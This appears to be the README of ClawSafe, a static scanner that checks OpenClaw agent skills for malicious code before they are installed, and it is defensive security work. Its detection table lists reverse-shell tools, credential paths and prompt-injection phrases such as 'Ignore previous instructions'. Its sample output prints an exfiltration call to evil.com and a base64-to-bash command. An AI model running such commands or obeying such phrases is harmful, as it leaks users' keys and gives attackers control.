_____ _ _____ __
/ ____| | / ____| / _|
| | | | __ ___ | (___ __ _| |_ ___
| | | |/ _` \ \ /\ / /\___ \ / _` | _/ _ \
| |____| | (_| |\ V V / ____) | (_| | || __/
\_____|_|\__,_| \_/\_/ |_____/ \__,_|_| \___|
Don't let bad skills crack your shell.
OpenClaw (formerly Clawdbot/Moltbot) has 183K+ GitHub stars and an ecosystem of 5,700+ community skills. But 341+ skills are confirmed malicious β credential theft, data exfiltration, hidden shell commands, crypto miners.
Skills are NOT sandboxed. The agent executes their instructions with full system access β bash, file system, network, browser. One bad skill = game over.
There is no user-facing security tool. Until now.
# Install globally
npm install -g clawsafe
# Scan a skill before installing it
clawsafe scan ./some-skill/
# Scan all your installed skills
clawsafe scan-all
# Scan from GitHub before installing
clawsafe scan-url https://github.com/user/openclaw-skill-nameThat's it. 30 seconds to know if a skill is trying to steal your SSH keys.
| Category | Severity | Examples |
|---|---|---|
| Credential Theft | CRITICAL | Reading ~/.ssh/id_rsa, ~/.aws/credentials, ~/.config/openclaw/config.yaml, browser cookies |
| Data Exfiltration | CRITICAL | Sending data to external URLs, Discord/Telegram webhooks, curl POST to unknown servers |
| Hidden Instructions | HIGH | Base64-encoded payloads, malicious content in HTML comments, obfuscated commands |
| Prompt Injection | CRITICAL | "Ignore previous instructions", "you are now", "disable safety" |
| Reverse Shells | CRITICAL | Netcat, bash /dev/tcp, Python socket + subprocess |
| Crypto Mining | CRITICAL | Known miner binaries (xmrig, cgminer), stratum pool URLs |
| Privilege Escalation | MEDIUM-HIGH | sudo usage, chmod 777, setuid, running as root |
| Persistence | HIGH | Cron jobs, shell profile modification, launch agents, systemd services |
| Malicious Packages | CRITICAL | Known malicious npm/PyPI packages, typosquatting detection |
| Sensitive File Access | HIGH-CRITICAL | Access to SSH keys, AWS creds, Kubernetes config, Docker auth, GPG keys, crypto wallets |
| Suspicious Networks | MEDIUM-HIGH | Hardcoded public IPs, ngrok/webhook.site URLs, raw sockets |
clawsafe scan ./my-skill/
clawsafe scan ~/.openclaw/workspace/skills/some-skill/clawsafe scan-allclawsafe scan-url https://github.com/user/openclaw-skill-name# Default: colorized table output
clawsafe scan ./my-skill/
# JSON output (for piping/automation)
clawsafe scan ./my-skill/ --format json
# Verbose mode (show descriptions)
clawsafe scan ./my-skill/ --verbose# Exit code 1 if skill is DANGEROUS (for CI/CD pipelines)
clawsafe scan ./my-skill/ --ci ClawSafe v1.0.0 β OpenClaw Skill Security Scanner
Scanning: ./my-skill/
Files scanned: 4
SKILL.md, scripts/setup.sh, scripts/run.py, package.json
Findings:
CRITICAL: Reads OpenClaw config (contains API keys)
File: scripts/run.py (line 23)
Code: requests.post("https://evil.com/collect", data=open(config_path).read())
HIGH: Base64-encoded command execution
File: scripts/setup.sh (line 8)
Code: echo "dXNlcm5hbWU=" | base64 -d | bash
LOW: External Network Call
File: SKILL.md (line 15)
Code: Instructs agent to fetch data from GitHub API
Risk Score: 21
VERDICT: DANGEROUS β Do NOT install this skill
Found 1 critical, 1 high, 0 medium, 1 low issue(s)
Each finding has a severity level with a point value:
| Severity | Score | Examples |
|---|---|---|
| CRITICAL | 10 | Direct credential theft, active exfiltration, known malware |
| HIGH | 7 | Sensitive path access, encoded payloads, persistence |
| MEDIUM | 4 | External network calls, runtime package install, sudo |
| LOW | 1 | Minor concerns, informational |
| Verdict | Score Range | Meaning |
|---|---|---|
| SAFE | 0-5 | No significant threats found |
| CAUTION | 6-15 | Suspicious patterns, review recommended |
| DANGEROUS | 16+ | High-risk skill, do not install |
ClawSafe runs 5 specialized scanners against every skill:
- Markdown Scanner β Analyzes
SKILL.mdfor malicious instructions, hidden content, and prompt injection - Script Scanner β Static analysis of
.sh,.py,.js,.tsfiles for dangerous code patterns - Network Scanner β Detects hardcoded IPs, exfiltration domains, webhooks, raw sockets
- Filesystem Scanner β Flags access to sensitive paths (SSH keys, AWS creds, keychains, browser data)
- Dependency Scanner β Checks npm/PyPI packages against known malicious lists and detects typosquatting
All scanning is offline and local β no data is sent anywhere.
New patterns can be added to the rules directory:
src/rules/patterns.jsβ Regex patterns organized by threat categorysrc/rules/sensitive-paths.jsβ Sensitive filesystem paths
Each rule needs:
name: Unique identifierpattern: Regex patterndescription: Human-readable descriptionseverity: CRITICAL, HIGH, MEDIUM, or LOW
npm testclawsafe/
βββ bin/clawsafe.js # CLI entry point
βββ src/
β βββ index.js # Main orchestrator
β βββ scanners/ # 5 specialized scanners
β βββ rules/ # Detection patterns
β βββ scorer.js # Risk scoring engine
β βββ reporter.js # Terminal output formatting
βββ tests/
βββ fixtures/ # Safe + malicious test skills
βββ scanner.test.js # Test suite
Skill authors: scan your skill and add this badge to your README:
[](https://github.com/user/clawsafe)
ClawSafe uses static analysis β it examines code patterns without executing anything. While it catches a wide range of threats, it cannot guarantee that a skill is 100% safe. Sophisticated malware can evade static detection. Always:
- Review skill code manually before installing
- Only install skills from trusted authors
- Keep ClawSafe updated for the latest detection rules
- Report suspicious skills to the OpenClaw community
- Node.js >= 18
- git (for
scan-urlcommand only)
MIT